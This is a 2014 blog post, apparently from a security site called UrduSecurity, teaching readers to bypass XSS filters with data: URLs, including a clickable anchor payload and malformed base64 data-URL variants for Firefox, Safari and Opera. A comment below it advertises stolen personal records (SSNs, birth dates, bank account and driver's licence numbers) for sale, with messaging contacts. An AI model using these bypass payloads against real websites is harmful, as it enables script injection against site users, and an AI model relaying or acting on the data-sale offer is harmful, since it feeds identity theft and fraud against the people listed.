Sunday 22 June 2014

Hello Friends,

After a Long time I'm Just Writing a Blog Post but Believe me its Really Fun , and Very Very Deeper Im Gonna TAke you if you really Understood What I'm gonna Describe Below.

Let's Start, Basically Data_Urls in their Base64 Encoded Form can be Used For XSS Filter Bypass. and it gets Serious While working with Firefox & Opera. When Newly Opened Documents Retain Access for Opening Page (Loading Completely). So Attacker Can Easily Trigger XSS on These Semi-Loaded Tags.

<a target=_blank href="data:text/html,");alert(1)//">Click Me</a>

Even We Can Base64_Encode This Payload. But Google-Chrome Will Block Attacker's Trick , So he Got Limited Options in His Pocket.



Fun Starts Now

 Now What if a Specific xss Filter Knows about data and try to Filter/Reject The Payload?? We Can ByPass it Still Ofcourse!! 

I Found an Intresting Way to Bypass it and You Might Like it .

data:text/html;base64UrduSecurity,[Attack-Payload] - Firefox & Safari data:text/html:;base64,[Attack-Payload]
data:text/html;base64,,[Attack-Payload] - Opera

and Here is Fully Designed Payload Ready !


This TAble Might Help You Someday.


Hope You Guys will Like This Tutorial, Leave Your Feed BAck, In case of Any Queries Let me know.

Playing with DATA URL Tags in HTML

  • Uploaded by: Adeel Chaudhary
  • Views:
  • Category: , ,
  • Share


    1. Hi All!

      I'm selling fresh & genuine SSN Leads, with good connectivity. All data is tested & verified.
      Headers in Leads:

      First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank NAME | DL Number | House Owner

      *You can ask for sample before any deal
      *Each SSN lead will be cost $1
      *Premium Lead will be cost $5
      *If anyone wants in bulk I will negotiate
      *Sampling is just for serious buyers

      Hope for the long term deal
      For detailed information please contact me on:

      Whatsapp > +923172721122
      Email >
      Telegram > @leadsupplier
      ICQ > 752822040


    Copyright © HACK | Designed by Muhammad Adeel | Founder UrduSecurity